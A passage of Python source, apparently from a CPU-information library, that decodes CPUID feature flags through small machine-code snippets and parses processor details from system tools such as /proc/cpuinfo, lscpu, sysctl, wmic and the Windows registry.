'3dnow' : is_bit_set(ebx, 31),
'lahf_lm' : is_bit_set(ecx, 0),
'cmp_legacy' : is_bit_set(ecx, 1),
'svm' : is_bit_set(ecx, 2),
'extapic' : is_bit_set(ecx, 3),
'cr8_legacy' : is_bit_set(ecx, 4),
'abm' : is_bit_set(ecx, 5),
'sse4a' : is_bit_set(ecx, 6),
'misalignsse' : is_bit_set(ecx, 7),
'3dnowprefetch' : is_bit_set(ecx, 8),
'osvw' : is_bit_set(ecx, 9),
'ibs' : is_bit_set(ecx, 10),
'xop' : is_bit_set(ecx, 11),
'skinit' : is_bit_set(ecx, 12),
'wdt' : is_bit_set(ecx, 13),
#'reserved' : is_bit_set(ecx, 14),
'lwp' : is_bit_set(ecx, 15),
'fma4' : is_bit_set(ecx, 16),
'tce' : is_bit_set(ecx, 17),
#'reserved' : is_bit_set(ecx, 18),
'nodeid_msr' : is_bit_set(ecx, 19),
#'reserved' : is_bit_set(ecx, 20),
'tbm' : is_bit_set(ecx, 21),
'topoext' : is_bit_set(ecx, 22),
'perfctr_core' : is_bit_set(ecx, 23),
'perfctr_nb' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
'dbx' : is_bit_set(ecx, 26),
'perftsc' : is_bit_set(ecx, 27),
'pci_l2i' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
#'reserved' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_kb' : ecx & 0xFF,
'line_size_b' : (ecx >> 12) & 0xF,
'associativity' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32, address = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64, address = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64()
return retval
def get_raw_hz(self):
start = self.get_ticks()
time.sleep(1)
end = self.get_ticks()
ticks = (end - start)
return ticks
def _actual_get_cpu_info_from_cpuid(queue):
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
# Pipe all output to nothing
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
queue.put(obj_to_b64({}))
return
# Return none if SE Linux is in enforcing mode
cpuid = CPUID()
if cpuid.is_selinux_enforcing:
queue.put(obj_to_b64({}))
return
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = to_hz_string(hz_actual)
# Get the Hz and scale
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : cpuid.get_vendor_id(),
'hardware' : '',
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_info['size_kb']),
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : hex(cache_info['associativity']),
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'extended_model' : info['extended_model'],
'extended_family' : info['extended_family'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = {k: v for k, v in info.items() if v}
queue.put(obj_to_b64(info))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
return {}
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
try:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_actual_get_cpu_info_from_cpuid, args=(queue))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
return {}
# Return the result, only if there is something to read
if not queue.empty():
output = queue.get()
return b64_to_obj(output)
except:
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = to_hz_string(hz_actual)
# Convert from GHz/MHz string to Hz
scale, hz_advertised = (0, None)
try:
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
except Exception:
pass
info = {
'hardware' : hardware,
'brand' : processor_brand,
'l3_cache_size' : to_friendly_bytes(cache_size),
'flags' : flags,
'vendor_id' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if to_raw_hz(hz_advertised, scale) > (0, 0):
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
if to_raw_hz(hz_actual, scale) > (0, 0):
info['hz_actual'] = to_friendly_hz(hz_actual, 6)
info['hz_actual_raw'] = to_raw_hz(hz_actual, 6)
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
try:
scale, hz_brand = 1, '0.0'
if not DataSource.has_cpufreq_info():
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
info = {
'hz_advertised' : to_friendly_hz(hz_brand, scale),
'hz_actual' : to_friendly_hz(hz_brand, scale),
'hz_advertised_raw' : to_raw_hz(hz_brand, scale),
'hz_actual_raw' : to_raw_hz(hz_brand, scale),
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
try:
if not DataSource.has_lscpu():
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = to_hz_string(new_hz)
scale = 6
info['hz_advertised'] = to_friendly_hz(new_hz, scale)
info['hz_actual'] = to_friendly_hz(new_hz, scale)
info['hz_advertised_raw'] = to_raw_hz(new_hz, scale)
info['hz_actual_raw'] = to_raw_hz(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = to_friendly_bytes(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = to_friendly_bytes(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache')
if l2_cache_size:
info['l2_cache_size'] = to_friendly_bytes(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = to_friendly_bytes(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : is_bit_set(left, 0),
'fpu' : is_bit_set(left, 1),
'slb' : is_bit_set(left, 2),
'run' : is_bit_set(left, 3),
#'reserved' : is_bit_set(left, 4),
'dabr' : is_bit_set(left, 5),
'ne' : is_bit_set(left, 6),
'wtr' : is_bit_set(left, 7),
# Byte 1
'mcr' : is_bit_set(left, 8),
'dsisr' : is_bit_set(left, 9),
'lp' : is_bit_set(left, 10),
'ri' : is_bit_set(left, 11),
'dabrx' : is_bit_set(left, 12),
'sprg3' : is_bit_set(left, 13),
'rislb' : is_bit_set(left, 14),
'pp' : is_bit_set(left, 15),
# Byte 2
'vpm' : is_bit_set(left, 16),
'dss_2.05' : is_bit_set(left, 17),
#'reserved' : is_bit_set(left, 18),
'dar' : is_bit_set(left, 19),
#'reserved' : is_bit_set(left, 20),
'ppr' : is_bit_set(left, 21),
'dss_2.02' : is_bit_set(left, 22),
'dss_2.06' : is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : is_bit_set(left, 24),
'ugr_in_dscr' : is_bit_set(left, 25),
#'reserved' : is_bit_set(left, 26),
#'reserved' : is_bit_set(left, 27),
#'reserved' : is_bit_set(left, 28),
#'reserved' : is_bit_set(left, 29),
#'reserved' : is_bit_set(left, 30),
#'reserved' : is_bit_set(left, 31),
# Byte 4
'sso_2.06' : is_bit_set(right, 0),
#'reserved' : is_bit_set(right, 1),
#'reserved' : is_bit_set(right, 2),
#'reserved' : is_bit_set(right, 3),
#'reserved' : is_bit_set(right, 4),
#'reserved' : is_bit_set(right, 5),
#'reserved' : is_bit_set(right, 6),
#'reserved' : is_bit_set(right, 7),
# Byte 5
'le' : is_bit_set(right, 8),
'cfar' : is_bit_set(right, 9),
'eb' : is_bit_set(right, 10),
'lsq_2.07' : is_bit_set(right, 11),
#'reserved' : is_bit_set(right, 12),
#'reserved' : is_bit_set(right, 13),
#'reserved' : is_bit_set(right, 14),
#'reserved' : is_bit_set(right, 15),
# Byte 6
'dss_2.07' : is_bit_set(right, 16),
#'reserved' : is_bit_set(right, 17),
#'reserved' : is_bit_set(right, 18),
#'reserved' : is_bit_set(right, 19),
#'reserved' : is_bit_set(right, 20),
#'reserved' : is_bit_set(right, 21),
#'reserved' : is_bit_set(right, 22),
#'reserved' : is_bit_set(right, 23),
# Byte 7
#'reserved' : is_bit_set(right, 24),
#'reserved' : is_bit_set(right, 25),
#'reserved' : is_bit_set(right, 26),
#'reserved' : is_bit_set(right, 27),
#'reserved' : is_bit_set(right, 28),
#'reserved' : is_bit_set(right, 29),
#'reserved' : is_bit_set(right, 30),
#'reserved' : is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
scale_advertised, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = to_hz_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize')
if l2_cache_size:
l2_cache_size = l2_cache_size + ' KB'
l3_cache_size = value.get('L3CacheSize')
if l3_cache_size:
l3_cache_size = l3_cache_size + ' KB'
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id' : value.get('Manufacturer'),
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale_advertised),
'hz_actual' : to_friendly_hz(hz_actual, scale_actual),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale_advertised),
'hz_actual_raw' : to_raw_hz(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
FIXME: Is missing many of the newer CPU flags like sse3
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id()
# Get the CPU arch and bits
raw_arch_string = DataSource.winreg_raw_arch_string()
arch, bits = parse_arch(raw_arch_string)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = to_hz_string(hz_actual)
# Get the advertised CPU Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 6),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 6),
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = to_hz_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def CopyNewFields(info, new_info):
keys = [
'vendor_id', 'hardware', 'brand', 'hz_advertised', 'hz_actual',
'hz_advertised_raw', 'hz_actual_raw', 'arch', 'bits', 'count',
'raw_arch_string', 'l2_cache_size', 'l2_cache_line_size',
'l2_cache_associativity', 'stepping', 'model', 'family',
'processor_type', 'extended_model', 'extended_family', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'raw_arch_string' : DataSource.raw_arch_string,
}
# Try the Windows wmic
CopyNewFields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
CopyNewFields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
